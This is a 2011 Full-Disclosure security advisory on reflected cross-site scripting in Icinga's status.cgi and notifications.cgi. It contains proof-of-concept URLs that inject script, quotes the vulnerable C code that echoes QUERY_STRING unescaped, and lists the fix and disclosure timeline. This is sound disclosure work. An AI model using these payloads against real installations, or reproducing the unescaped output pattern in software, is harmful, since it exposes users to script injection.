[Full-disclosure] Cross-Site Scripting vulnerabilities in Icinga



-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Advisory: Cross-Site Scripting vulnerabilities in Icinga
Advisory ID: SSCHADV2011-001
Author: Stefan Schurtz
Affected Software: Successfully tested on: icinga-1.3.0 / icinga-1.2.1
Vendor URL: http://www.icinga.org
Vendor Status: fixed csv export link to make it XSS save (IE) #1275
CVE-ID: -

==========================
Vulnerability Description:
==========================

This is Cross-Site Scripting vulnerability

==================
Technical Details:
==================

No input validation for "QUERY_STRING"

Problem in "status.c"

http://site/icinga/cgi-bin/status.cgi?'</style></script><script>alert('XSS')</script>
http://site/icinga/cgi-bin/status.cgi?'</style></script><script>alert('XSS')</script><A
HREF='status.cgi

/* add export to csv link */

if(getenv("QUERY_STRING")!=NULL) {
printf("<td valign=bottom width=33%%><div
class='csv_export_link'><a href='%s?%s&csvoutput' target='_blank'>Export
to CSV</a></div></td>n",STATUS_CGI,strdup(getenv("QUERY_STRING")));
} else {
printf("<td valign=bottom width=33%%><div
class='csv_export_link'><a href='%s?csvoutput' target='_blank'>Export to
CSV</a></div></td>n",STATUS_CGI);


Problem in "notification.c"

http://site/icinga/cgi-bin/notifications.cgi?'</style></script><script>alert('XSS')</script>
http://site/icinga/cgi-bin/notifications.cgi?'</style></script><script>alert('XSS')</script><A
HREF='notifications.cgi

if(getenv("QUERY_STRING")!=NULL) {
printf("<TR><TD colspan='7'><DIV class='csv_export_link'><A
HREF='%s?%s&csvoutput' target='_blank'>Export to
CSV</A></DIV></TD></TR>n",NOTIFICATIONS_CGI,strdup(getenv("QUERY_STRING")));
} else {
printf("<TR><TD colspan='7'><DIV class='csv_export_link'><A
HREF='%s?csvoutput' target='_blank'>Export to
CSV</A></DIV></TD></TR>n",NOTIFICATIONS_CGI);
}

=========
Solution:
=========

ID: 90c2209dfc7b8b6a174f46eb5d2a87d1a9789383

https://dev.icinga.org/projects/icinga-core/repository/revisions/90c2209dfc7b8b6a174f46eb5d2a87d1a9789383/diff

fixed csv export link to make it XSS save (IE) #1275

====================
Disclosure Timeline:
====================

04-Mar-2011 - informed developers
07-Mar-2011 - Bug 1275 - make csv export link XSS save - on "Icinga
Development Mailinglist"
07-Mar-2011 - informed DFN-CERT - cert@xxxxxxxxxxx
07-Mar-2011 - Release date of this security advisory
07-Mar-2011 - developers fixed csv export link to make it XSS save (IE)
#1275
08-Mar-2011 - post on BugTraq -
http://www.securityfocus.com/archive/1/516917/30/0/threaded

========
Credits:
========

Vulnerability found and advisory written by Stefan Schurtz.

===========
References:
===========

http://www.icinga.org
http://www.rul3z.de/advisories/SSCHADV2011-001.txt
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.9 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iEYEARECAAYFAk15Di8ACgkQg3svV2LcbMDjsgCgkCHwRmGX+nqRZxhIgaYYOlpD
a0QAn0XpCPKteX3O42ZMjophU7iId1Tu
=1g+v
-----END PGP SIGNATURE-----

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



Relevant Pages